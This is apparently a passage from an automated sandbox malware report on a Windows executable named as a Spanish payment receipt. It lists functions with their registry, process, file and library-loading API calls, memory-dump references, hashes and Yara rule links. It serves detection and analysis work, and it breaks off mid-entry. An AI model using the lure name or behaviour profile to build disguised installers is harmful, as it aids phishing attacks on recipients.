                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 334405425-0
                                                                                                                                                                                    • Opcode ID: 11c3cf00bd93389db0dc410ebbe218bf6d9da3e13992e2678f31c330316c266a
                                                                                                                                                                                    • Instruction ID: 94cae06f4fc191ca30d479cf411a95ccd627b95a6d871bbe988cbf7c6203fea7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 11c3cf00bd93389db0dc410ebbe218bf6d9da3e13992e2678f31c330316c266a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D21F231904104FBCF11AFA5CF48A9E7A71BF48354F20013BF501B91E0DBBD8A92965D
                                                                                                                                                                                    Function 00401B9B Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00401C0B
                                                                                                                                                                                    • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C1D
                                                                                                                                                                                      • Part of subcall function 00406544: lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
                                                                                                                                                                                      • Part of subcall function 00406544: lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004055A0,Completed,00000000), ref: 00406743
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Global$AllocFreelstrcatlstrlen
                                                                                                                                                                                    • String ID: ExecToStack
                                                                                                                                                                                    • API String ID: 3292104215-166031814
                                                                                                                                                                                    • Opcode ID: 3068f9b91c3f4162d0930761ac5c94cf9212319f1563e24b4ffc4f3e6270dea2
                                                                                                                                                                                    • Instruction ID: e925a152a6e0f7021576dd296752ea90fe74f89098b2d6bde03e837448aacd47
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3068f9b91c3f4162d0930761ac5c94cf9212319f1563e24b4ffc4f3e6270dea2
                                                                                                                                                                                    • Instruction Fuzzy Hash: BA213673904210EBD720AFA4DEC5E5E72A4EB08328715093BF552B72D1D6BCE8518B5D
                                                                                                                                                                                    Function 0040248A Relevance: 4.6, APIs: 3, Instructions: 64registrystringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenW.KERNEL32(0040B5C8,00000023,00000011,00000002), ref: 004024D5
                                                                                                                                                                                    • RegSetValueExW.KERNELBASE(?,?,?,?,0040B5C8,00000000,00000011,00000002), ref: 00402515
                                                                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,0040B5C8,00000000,00000011,00000002), ref: 004025FD
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseValuelstrlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2655323295-0
                                                                                                                                                                                    • Opcode ID: 115faf02d334c89f827882088b0be8a93b9cbe5759b9d35681ab44e4bb566471
                                                                                                                                                                                    • Instruction ID: 742bbefa47e989f243bf6062c522ac596cbc11b4bfeba2949f21d1d9b27b1258
                                                                                                                                                                                    • Opcode Fuzzy Hash: 115faf02d334c89f827882088b0be8a93b9cbe5759b9d35681ab44e4bb566471
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B11AC71E00108BEEB10AFA1DE49EAEBAB8FF44358F10403AF404B61C1D7B88D409A68
                                                                                                                                                                                    Function 0040259E Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D1
                                                                                                                                                                                    • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E4
                                                                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,0040B5C8,00000000,00000011,00000002), ref: 004025FD
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Enum$CloseValue
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 397863658-0
                                                                                                                                                                                    • Opcode ID: eb6c8e15ee44575ea420681c9cc2a7e67ba876646878e1eb00c8e7fc00d42c1f
                                                                                                                                                                                    • Instruction ID: 8c40f98af4add78d59c4bc2bb7842a1dfdaddd4ec6c9bbdee1c196b88a33675a
                                                                                                                                                                                    • Opcode Fuzzy Hash: eb6c8e15ee44575ea420681c9cc2a7e67ba876646878e1eb00c8e7fc00d42c1f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 61017CB1A04105BBEB159F94DE58AAFB66CEF40348F10403AF501B61D0EBB85E45966D
                                                                                                                                                                                    Function 0040252A Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 0040255B
                                                                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,0040B5C8,00000000,00000011,00000002), ref: 004025FD
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseQueryValue
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3356406503-0
                                                                                                                                                                                    • Opcode ID: 06d9a8ad9cd75b344e281f0f33afa87d54a5442f7653d28a97a29c4d8ae17323
                                                                                                                                                                                    • Instruction ID: f1f7847c69b95e8b88bdf62be751073741875666d26e4aee14b76084b72d5d95
                                                                                                                                                                                    • Opcode Fuzzy Hash: 06d9a8ad9cd75b344e281f0f33afa87d54a5442f7653d28a97a29c4d8ae17323
                                                                                                                                                                                    • Instruction Fuzzy Hash: E2116D71900219EBDF14DFA4DE589AE7774FF04345B20443BE401B62D0E7B88A45EB5E
                                                                                                                                                                                    Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                                    • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                                                    • Opcode ID: 970bce7bfd6110042ba11e2ba34b1580a3262637bb8a43ad7db674ac8d0d0c57
                                                                                                                                                                                    • Instruction ID: 40daf909c284af41af5c9cdf7f458e0296b91398e9c9917f7ae767538e8fd086
                                                                                                                                                                                    • Opcode Fuzzy Hash: 970bce7bfd6110042ba11e2ba34b1580a3262637bb8a43ad7db674ac8d0d0c57
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A01D131724220EBEB194B389D09B2A3698E710318F10867AF855F66F1E6788C129B5C
                                                                                                                                                                                    Function 0040563C Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 0040564C
                                                                                                                                                                                      • Part of subcall function 004044AF: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044C1
                                                                                                                                                                                    • CoUninitialize.COMBASE(00000404,00000000,?,00000000,?), ref: 00405698
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeMessageSendUninitialize
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2896919175-0
                                                                                                                                                                                    • Opcode ID: a1e7d01539343cbedca50b7a5125379b8eaabd142d8c7e4c73993699b28e4919
                                                                                                                                                                                    • Instruction ID: e8a19e3ae465cdfca2bef1253819f9a2a21047bc58a71dd1e8c92fd5a8ca6894
                                                                                                                                                                                    • Opcode Fuzzy Hash: a1e7d01539343cbedca50b7a5125379b8eaabd142d8c7e4c73993699b28e4919
                                                                                                                                                                                    • Instruction Fuzzy Hash: EFF0F0B2600600DBE3115754A901B677364EB80304F85497AEF88623E1CB3B0C128A2E
                                                                                                                                                                                    Function 00401EDE Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                                                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$EnableShow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1136574915-0
                                                                                                                                                                                    • Opcode ID: d503c9f13438e3c869f1bbfba4ca0b9980fccaccea62ec0994004058657006bf
                                                                                                                                                                                    • Instruction ID: 5d3c5223d4adea09edd48fe2ddafa99b3fbee87e2958761c9001e4fb32d1ad87
                                                                                                                                                                                    • Opcode Fuzzy Hash: d503c9f13438e3c869f1bbfba4ca0b9980fccaccea62ec0994004058657006bf
                                                                                                                                                                                    • Instruction Fuzzy Hash: C3E0D872908201CFE705EBA4EE485AE73F4EF40315710097FE401F11D1DBB54C00866D
                                                                                                                                                                                    Function 00405AEA Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426710,00000000,00000000), ref: 00405B13
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00405B20
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseCreateHandleProcess
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3712363035-0
                                                                                                                                                                                    • Opcode ID: 0e81a11ecc4c6fe7d2bd14f7f4550c250266fb7a2a5fb983bdda8c5a8ca6adfb
                                                                                                                                                                                    • Instruction ID: 90cc6d476167cb297d6b140a5f1e3d8b94c2ff7c6bb70ea469832da4d223c92c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e81a11ecc4c6fe7d2bd14f7f4550c250266fb7a2a5fb983bdda8c5a8ca6adfb
                                                                                                                                                                                    • Instruction Fuzzy Hash: F2E0BFB46002097FEB109B64ED45F7B77BCEB04608F414465BD54F6150DB74A9158E7C
                                                                                                                                                                                    Function 004068D4 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,00000020,?,00403607,0000000B), ref: 004068E6
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00406901
                                                                                                                                                                                      • Part of subcall function 00406864: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040687B
                                                                                                                                                                                      • Part of subcall function 00406864: wsprintfW.USER32 ref: 004068B6
                                                                                                                                                                                      • Part of subcall function 00406864: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004068CA
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2547128583-0
                                                                                                                                                                                    • Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                                                                                                                                                    • Instruction ID: b54d22b37b479e59566a9631c032e51b8c6cd741f5ea0e4d018af200ac078f8b
                                                                                                                                                                                    • Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                                                                                                                                                    • Instruction Fuzzy Hash: 48E086335042109AE21197715D44C7B73A8AF89650307443EF947F2080DB38DC31A669
                                                                                                                                                                                    Function 00405FF7 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\Justificante pago-09453256434687.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
                                                                                                                                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$AttributesCreate
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 415043291-0
                                                                                                                                                                                    • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                                                                                                                    • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
